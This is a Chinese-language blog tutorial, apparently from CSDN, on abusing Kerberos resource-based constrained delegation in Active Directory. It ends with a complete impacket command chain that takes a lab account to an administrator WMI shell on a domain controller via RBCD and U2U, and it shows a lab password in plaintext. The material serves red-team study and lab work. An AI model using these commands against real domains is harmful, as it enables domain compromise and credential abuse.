基于资源的约束委派

最新推荐文章于 2024-06-02 15:21:42 发布
最新推荐文章于 2024-06-02 15:21:42 发布
阅读量660 收藏 22
点赞数 19
文章标签: 前端 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/137020200
版权

RBCD

给机器添加RBCD的前提:1.自己能给自己添加 2.ACL→Account Restriction/msDS-AllowedToActOnBehalfOfOtherIdentity属性→creator-sid/backdoor/high level user。如果对计算机对象/域用户具Account Restriction和msDS-AllowedToActOnBehalfOfOtherIdentity属性的WriteProperty,就能进行基于 资源约束委派的利用。

简单利用

基于资源的约束委派(Computer)

添加
分两种情况:

(1).creator-sid 用户:alice-workstation$由alice拉入域中,则alice默认就具有alice-workstation$的Account Restriction的WriteProperty权限

(2).拿下域权限后添加bob对alice-workstation$的msDS-AllowedToActOnBehalfOfOtherIdentity的WriteProperty权限 1.ldap_shell

2.lex

adfind对alice-workstation的acl进行查询:

滥用

以bob对alice-workstation$滥用进行演示:

域用户默认能添加 10 台计算机入域(maq),以bob的身份添加bob-evil$

设置bob-evil到alice-station$的rbcd

约束委派生成administrator对alice-station$的cifs ST票据

导入票据并获得一个wmi的交互式shell

基于资源的约束委派(User)→MAQ=0

前段时间,老外已经研究出了这种利用方式:

https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html 在maq=0的情况下,攻击者无法创建机器账户,可以通过域用户rbcd到域机器账户进行滥用。

添加

跟上面一样,alice-station由alice拉入域中,所以alice具有alice-station$域用户的 **msDS-AllowedToActOnBehalfOfOtherIdentity的 WriteProperty权限。** 设置bob到alice-station$到bob的rbcd:

滥用

getST.py生成administrator对alice-station的cifs ST票据:

在S4U2self阶段报错:Kerberos SessionError:KDC_ERR_S_PRINCIPAL_UNKNOWN。

这是因为用户默认没有注册SPN,KDC无法选择正确的密钥来解密,所以在S4U2Self才会失败。如果将 SPN 添加到bob就能成功从 KDC申请ST票据,这意味着这不是用户帐户本身的问题,而只是 KDC 无法选择正确密钥进行解密。

U2U实现了用户到用户的身份验证拓展,在S4U2Proxy阶段KDC会尝试使用bob的Long-term key(bob 的hash)进行解密,但U2U会使 用附加到TGS-REQ当中的TGT会话密钥加密之后的票据,KDC无法正常解密。这时可以利用SamrChangePasswordUser在S4U2Self 和S4U2Proxy中间将bob的hash更改成U2U对TGT加密密钥的值,KDC就能成功解密并颁发ST票据。具体可参考:https://mp.weixin.qq.com/s/1eJb-UtSVRV5JF0gfQgwWg

impacket利用

以设置普通域用户dandy基于资源约束委派到dc1$为例,这里直接粗暴利用administrator设置rbcd

# 设置dandy到dc1$的RBCD
python3 rbcd.py redteam.lab/administrator:Qq123456.. -action write -delegate-to 'dc1$' -delegate-from 'dandy' -dc-ip 192.168.134.
# 使用dandy的hash生成TGT(ntlm hash使用RC4加密)
getTGT.py -hashes :$(pypykatz crypto nt 'Qq123456..') 'redteam.lab/dandy' -dc-ip 192.168.134.
# 获取dandyTGT的Session Key
python3 describeticket.py dandy.ccache | grep 'Ticket Session Key'
# 将dandy的hash设置为Session Key
python3 smbpasswd.py -newhashes :c592bc40c1908aff4787f4f4db7f0a82 'redteam/dandy:Qq123456..'@dc1.redteam.lab
# 导入TGT
export KRB5CCNAME=dandy.ccache
# 利用u2u获取dc1的host service的ST
python3 getST.py -u2u -impersonate administrator -spn "host/dc1.redteam.lab" -k -no-pass 'redteam.lab/dandy'
# 导入ST
export KRB5CCNAME=administrator@host_dc1.redteam.lab@REDTEAM.LAB.ccache
# WMI
python3 wmiexec.py administrator@dc1.redteam.lab -k -no-pass

注:SamrChangePasswordUser受域组策略影响,域内默认且普遍存在密码策略,可能不能做到及时改回密码。如果肯定通过当前 域用户能拿下DC的话可以进行尝试,利用成功后将用户密码改为原来的值。

网安星星
关注
  • 19
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动描述基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。编译指令确保成功安装了必要的NuGet软件包,...
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory域中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是...
基于资源约束委派攻击
good good study
04-13 2113
基于资源约束性委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束性委派。基于资源约束委派不需要域管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束性委派的账号的SID。如admin--pc的 msDS-AllowedT
【域权限维持】-基于资源约束委派(RBCD)
qq_41617902的博客
01-20 841
基于资源约束委派(RBCD)
域内攻击--->基于资源约束委派(RBCD)
最新发布
huohaowen的博客
06-02 739
基于资源约束性委派RBCD他来啦~~~!!!
kerberos委派详解
qq_53058639的博客
08-11 219
委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。例如MSSQL Server在安装时,会在域内自动注册服务账号’SqlServiceAccount’,这类账号不能用于交互式上图是经典的应用场景。
Kerberos 域委派攻击之基于资源约束性委派
Adminxe的博客
03-06 630
CSDN自动迁移博客文章注意区别:约束性委派 不能跨域进行委派,基于资源约束性委派可以跨域和林如果约束性委派,必须拥有权限,该特权是敏感的,通常仅授予域管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束性委派不需要域管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束性委派允许资源配置受信任的帐户委派给他们。基于资源约束性委派只能在运行 ·Windows Server 2012 及以上的域控制器·上配置
AD域内委派后门详解-1
06-19
本文将详细介绍三种类型的域委派,以及攻击者如何利用这些委派进行非约束委派攻击、约束委派攻击和基于资源约束委派攻击。 1. **非约束委派攻击** 非约束委派允许服务账号在任何地方代表用户进行身份验证,而不...
20XX年银行人力资源部工作年度总结.pdf
12-05
此外,全面实施了会计主管委派制,选拔并委派了16名会计主管到各支行,进一步强化了财务管理。 2. 劳动工资管理完善: 银行继续完善工资分配方案,实行“效益优先、保障基本”的原则,绩效工资与存款、经营收入、...
StandIn:StandIn是一个小型的.NET3545 AD开发后工具包
04-12
之所以出现StandIn,是因为最近在我们需要一个.NET本机解决方案来执行基于资源约束委派。 但是,StandInSwift膨胀,包括许多舒适功能。 我想继续开发StandIn,以使自己更多地了解Directory Services编程,并希望...
基于资源约束委派(RBCD)学习
whojoe的博客
07-21 2903
基于资源约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 域内机器 user2.test.com 192.168.164.150
域渗透之委派利用方式(详细)
weixin_65550121的博客
12-08 950
如下图:客户端想要访问www.xxxx.com,这个网站去下载一个文件,而文件在文件服务器上面,这时候客户端无法直接拿到这个文件,所以就委托HTTP服务器帮客户端把文件文件拿到,然后给客户端。这里提到了一个关键词是委托,说的简单点就是比如说自己手里有点事走不开,但是自己饿了,想吃饭,所以我把钱给我同事,并且委托我同事去帮忙买个饭,店里将饭做好之后交给我同事,然后我同事交给我。
内网渗透--域环境下基于资源约束委派利用
sangfor_edu的博客
07-21 397
域内用户都有一个属性叫做ms-ds-MachineAccountQuota,它代表的是允许用户在域中常见计算机账户的个数,默认是10。那么这就代表我们如果拥有一个普通的域用户那么我们就可以利用这个用户最多可以创建十个新的计算机帐户也就是机器账户。...
域渗透——基于资源约束委派利用
a3320315的博客
07-03 1833
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 域内普通用户: test,对win2008有写的权限 域内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
域渗透之基于资源约束委派
qq_56426046的博客
11-15 451
REDTEAM\hack -> WriteProperty(将机器加入域的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加 多达10个计算机帐户,就是说只要有一个域凭据就可以在域内任意添加机器账户。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。
基于windows中委派的攻击思路(下)-基于资源约束性委派
热门推荐
Shanfenglan's blog
12-16 3万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
滥用基于资源约束委派来攻击Active Directory
weixin_30530523的博客
03-15 460
0x00 前言 早在2018年3月前,我就开始了一场毫无意义的争论,以证明TrustedToAuthForDelegation属性是无意义的,并且可以在没有该属性的情况下实现“协议转换”。我相信,只要一旦启用约束委派(msDS-AllowedToDelegateTo不为空),它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy(@genti...
DNS区域委派与转发详解
本文主要介绍了DNS的区域委派与转发机制,以及DNS系统的基本概念,包括DNS区域类型、DNS搜索区域的类型和DNS资源记录。 在DNS系统中,客户端与服务器之间的交互是通过TCP/IP协议进行的,客户端通常会向最近且可访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值